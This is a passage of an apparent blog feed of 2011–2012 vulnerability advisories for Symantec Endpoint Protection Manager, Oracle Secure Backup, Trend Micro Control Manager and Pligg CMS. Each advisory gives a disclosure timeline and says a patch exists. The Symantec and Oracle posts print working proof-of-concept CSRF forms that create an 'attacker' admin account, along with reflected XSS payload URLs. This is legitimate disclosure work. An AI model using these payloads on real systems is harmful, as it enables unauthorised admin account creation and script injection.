&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://forums.pligg.com/downloads.php?do=file&amp;amp;id=13" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://forums.pligg.com/downloads.php?do=file&amp;amp;id=13&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Secunia:&amp;nbsp;&lt;/span&gt;&lt;a href="http://secunia.com/advisories/44352/" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://secunia.com/advisories/44352/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;2011-04-24 - Vulnerability discovered.&lt;br /&gt;2011-04-24 - Vulnerability reported to Secunia.&lt;br /&gt;2011-04-26 - Secunia confirmed the vulnerability and contacted the vendor.&lt;br /&gt;2011-09-18 - Patch released.&lt;br /&gt;2011-09-20 - Advisory published by Secunia.&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/p8noA3UQRXM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/8878480905885395544/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/pligg-cms-114-cross-site-scripting.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/8878480905885395544?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/8878480905885395544?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/p8noA3UQRXM/pligg-cms-114-cross-site-scripting.html" title="Pligg CMS 1.1.4 Cross-Site Scripting (XSS) Vulnerability" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/pligg-cms-114-cross-site-scripting.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ak8GSHs9eip7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-3737166148193848141</id><published>2012-04-28T22:30:00.000+08:00</published><updated>2012-05-11T14:47:09.562+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:47:09.562+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="CSRF" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="Symantec" /><title>Symantec Endpoint Protection Manager 11.0.6 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Symantec End point Protection Manager Console lets user centrally manages the Symantec End point Protection clients. From the console user can install clients, set and enforce a securit ypolicy, and monitor and report on the clients. The console can be run from the computer hosting Symantec Endpoint Protection Manager or remotely through a Web-based interface.&lt;br /&gt;&lt;br /&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in&amp;nbsp;Symantec Endpoint Protection Manager. These issues were discovered in a default installation of&amp;nbsp;Symantec Endpoint Protection Manager 11.0.6. Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Cross-Site Request Forgery (CSRF)&lt;br /&gt;==========================&lt;/span&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;form action="https://[target]:8443/portal/Settings.jsp?action=NewAccount"&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;id="csrf" method="post"&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="spcName" value="attacker" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="spcUsername" value="attacker" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="spcNewPwd" value="passwd123" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="spcNewPwd2" value="passwd123" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="group1" value="Admin" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="btnSubmit" value="Create+Account" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/form&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;document.getElementById('csrf').submit();&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Cross-Site Scripting (XSS)&lt;br /&gt;====================&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;https://[target]:8443/console/apps/sepm/?&amp;gt;'"&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;https://[target]:8443/portal/Help.jsp?token='"--&amp;gt;&amp;lt;/style&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;a href="http://1.bp.blogspot.com/-kAN7Bzyv2Gw/T5v930dt8EI/AAAAAAAAAFA/lQX58yzYzDo/s1600/XSS-IE6.PNG"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-kAN7Bzyv2Gw/T5v930dt8EI/AAAAAAAAAFA/lQX58yzYzDo/s400/XSS-IE6.PNG" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Symantec&amp;nbsp;has released patches which address these issues. Please see the references for more information.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&amp;amp;pvid=security_advisory&amp;amp;year=2011&amp;amp;suid=20110810_00" target="_blank"&gt;http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&amp;amp;pvid=security_advisory&amp;amp;year=2011&amp;amp;suid=20110810_00&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Secunia:&amp;nbsp;&lt;/span&gt;&lt;a href="http://secunia.com/advisories/43662/" target="_blank"&gt;http://secunia.com/advisories/43662/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;2011-03-07 - Vulnerabilities discovered.&lt;br /&gt;2011-03-07 - Vulnerabilities reported to Secunia.&lt;br /&gt;2011-03-09 - Secunia confirmed the vulnerabilities and contacted the vendor.&lt;br /&gt;2011-08-10 -&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Patch released.&lt;br /&gt;2011-08-11 -&amp;nbsp;&lt;/span&gt;Advisory published by Secunia.&lt;/span&gt;&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/1MTLH7py2vM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/3737166148193848141/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/symantec-endpoint-protection-manager.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/3737166148193848141?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/3737166148193848141?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/1MTLH7py2vM/symantec-endpoint-protection-manager.html" title="Symantec Endpoint Protection Manager 11.0.6 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-kAN7Bzyv2Gw/T5v930dt8EI/AAAAAAAAAFA/lQX58yzYzDo/s72-c/XSS-IE6.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/symantec-endpoint-protection-manager.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ak8ARno6eyp7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-5326409229160357034</id><published>2012-04-28T10:11:00.000+08:00</published><updated>2012-05-11T14:47:27.413+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:47:27.413+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="CSRF" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="Oracle" /><title>Oracle Secure Backup 10.3.0.3.0 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Oracle Secure Backup is a general-purpose network data protection tool that simplifies and automates the backup and restore of files on a file system.&amp;nbsp;The software can also serve as a media management layer for Recovery Manager through the SBT interface.&lt;br /&gt;&lt;br /&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in&amp;nbsp;Oracle Secure Backup. These issues were discovered in a default installation of&amp;nbsp;Oracle Secure Backup 10.3.0.3.0. Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Cross-Site Request Forgery (CSRF)&lt;br /&gt;==========================&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;form action="https://[target]/index.php" id="csrf" method="post"&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="process" value="1" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="tab" value="2" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="mode" value="2" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="button" value="Ok" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="screen" value="d" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="selector%5B%5D" value="" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="changeobject" value="attacker" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="upassword" value="passwd123" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="vpassword" value="passwd123" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="oclass" value="admin" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="uclass" value="" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="givenname" value="" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="unixname" value="" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="unixgroup" value="" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="ndmpserveruser" value="no" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="emailaddress" value="" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;input type="hidden" name="op" value="Add" /&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/form&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;document.getElementById('csrf').submit();&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;Cross-Site Scripting (XSS)&lt;br /&gt;====================&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;https://[target]/login.php?clear=yes&amp;amp;tab='%20stYle='x:expre/**/ssion(alert(1))%20&amp;amp;mode=3&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;https://[target]/login.php?clear=yes&amp;amp;tab=3&amp;amp;mode='%20stYle='x:expre/**/ssion(alert(1))&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;a href="http://2.bp.blogspot.com/-3oo3ti9SRaE/T5tPRMudyCI/AAAAAAAAAE0/e7v_AgXtpY8/s1600/Oracle_Secure_Backup_XSS.png"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-3oo3ti9SRaE/T5tPRMudyCI/AAAAAAAAAE0/e7v_AgXtpY8/s400/Oracle_Secure_Backup_XSS.png" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Oracle has released patches which address these issues. Please see the references for more information.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Secunia:&amp;nbsp;&lt;/span&gt;&lt;a href="http://secunia.com/advisories/43011/" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://secunia.com/advisories/43011/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;2011-01-21 - Vulnerabilities discovered.&lt;br /&gt;2011-01-21 - Vulnerabilities reported to Secunia.&lt;br /&gt;2011-01-21 - Secunia confirmed the vulnerabilities and contacted the vendor.&lt;br /&gt;2011-07-19 -&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Patch released.&lt;br /&gt;2011-07-20 -&amp;nbsp;&lt;/span&gt;Advisory published by Secunia.&lt;/span&gt;&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/OL7o6OBJYsM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/5326409229160357034/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/oracle-secure-backup-103030-cross-site.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/5326409229160357034?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/5326409229160357034?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/OL7o6OBJYsM/oracle-secure-backup-103030-cross-site.html" title="Oracle Secure Backup 10.3.0.3.0 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-3oo3ti9SRaE/T5tPRMudyCI/AAAAAAAAAE0/e7v_AgXtpY8/s72-c/Oracle_Secure_Backup_XSS.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/oracle-secure-backup-103030-cross-site.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ak8BSHg7eSp7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-5548071395075127087</id><published>2012-04-28T09:44:00.000+08:00</published><updated>2012-05-11T14:47:39.601+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:47:39.601+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Directory Traversal" /><category scheme="http://www.blogger.com/atom/ns#" term="Trend Micro" /><title>Trend Micro Control Manager 5.5 Directory Traversal Vulnerability</title><content type="html">&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Trend Micro Control Manager provides a convenient centralized security management console that is designed to minimize administrative complexity and work with Trend Micro solutions to maximize security.&lt;br /&gt;&lt;br /&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered&amp;nbsp;Cross-Site Scripting vulnerability&amp;nbsp;in&amp;nbsp;Trend Micro Control Manager. This issue was discovered in a default installation of&amp;nbsp;Trend Micro Control Manager&amp;nbsp;5.5 Build 1250 (Hot Fix: 1350). Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://2.bp.blogspot.com/-c-31nFtw7gM/T5tLQ3UepeI/AAAAAAAAAEg/a8fEJh1i43c/s1600/TM-Control-Manager-5.5-Dir-Traversal-PoC+(Request).png"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-c-31nFtw7gM/T5tLQ3UepeI/AAAAAAAAAEg/a8fEJh1i43c/s400/TM-Control-Manager-5.5-Dir-Traversal-PoC+(Request).png" /&gt;&lt;/a&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://4.bp.blogspot.com/-kcRvVlzMNx0/T5tLSbbzMQI/AAAAAAAAAEo/pKQ3z1aD4hk/s1600/TM-Control-Manager-5.5-Dir-Traversal-PoC+(Response).png"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-kcRvVlzMNx0/T5tLSbbzMQI/AAAAAAAAAEo/pKQ3z1aD4hk/s400/TM-Control-Manager-5.5-Dir-Traversal-PoC+(Response).png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Solution&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Trend Micro&amp;nbsp;has released patches which address this issue. Please see the references for more information.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;References&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Vendor URL:&amp;nbsp;&lt;/span&gt;&lt;a href="http://downloadcenter.trendmicro.com/index.php?prodid=7#fragment-1845" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://downloadcenter.trendmicro.com/index.php?prodid=7#fragment-1845&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Secunia:&amp;nbsp;&lt;/span&gt;&lt;a href="http://secunia.com/advisories/44134/" style="font-family: Verdana, sans-serif;" target="_blank"&gt;http://secunia.com/advisories/44134/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span style="color: orange;"&gt;Disclosure Timeline&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;2011-04-09 - Vulnerability discovered.&lt;br /&gt;2011-04-09 - Vulnerability reported to Secunia.&lt;br /&gt;2011-04-29 - Secunia confirmed the vulnerability and contacted the vendor.&lt;br /&gt;2011-06-15 - Patch released.&lt;br /&gt;2011-06-16 - Advisory published by Secunia.&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/hMi39FcAkZA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://chingshiong.blogspot.com/feeds/5548071395075127087/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://chingshiong.blogspot.com/2012/04/trend-micro-control-manager-55.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/5548071395075127087?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/566969067083138258/posts/default/5548071395075127087?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SowChingShiong-VulnerabilityResearch/~3/hMi39FcAkZA/trend-micro-control-manager-55.html" title="Trend Micro Control Manager 5.5 Directory Traversal Vulnerability" /><author><name>Sow Ching Shiong</name><uri>http://www.blogger.com/profile/03730833188821859155</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://4.bp.blogspot.com/-YDjq4hlEZts/T5_ydXb9c0I/AAAAAAAAAHQ/M3ZqiJtV2bo/s220/okladka2.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-c-31nFtw7gM/T5tLQ3UepeI/AAAAAAAAAEg/a8fEJh1i43c/s72-c/TM-Control-Manager-5.5-Dir-Traversal-PoC+(Request).png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://chingshiong.blogspot.com/2012/04/trend-micro-control-manager-55.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ak8DRnkyfip7ImA9WhVVF0w.&quot;"><id>tag:blogger.com,1999:blog-566969067083138258.post-341409011880538371</id><published>2012-04-28T09:39:00.000+08:00</published><updated>2012-05-11T14:47:57.796+08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-11T14:47:57.796+08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Trend Micro" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><title>Trend Micro Control Manager 5.5 Cross-Site Scripting (XSS) Vulnerability</title><content type="html">&lt;br /&gt;
&lt;b style="font-family: Verdana, sans-serif;"&gt;&lt;span style="color: orange;"&gt;Description&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: Verdana, sans-serif;"&gt;Trend Micro Control Manager provides a convenient centralized security management console that is designed to minimize administrative complexity and work with Trend Micro solutions to maximize security.&lt;br /&gt;&lt;br /&gt;Sow Ching Shiong, an independent vulnerability researcher has discovered&amp;nbsp;Cross-Site Scripting vulnerability&amp;nbsp;in&amp;nbsp;Trend Micro Control Manager. This issue was discovered in a default installation of&amp;nbsp;Trend Micro Control Manager&amp;nbsp;5.5 Build 1250 (Hot Fix: 1350). Other earlier versions may also be affected.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: orange; font-family: Verdana, sans-serif;"&gt;Proof of concept&lt;/b&gt;&lt;br /&gt;
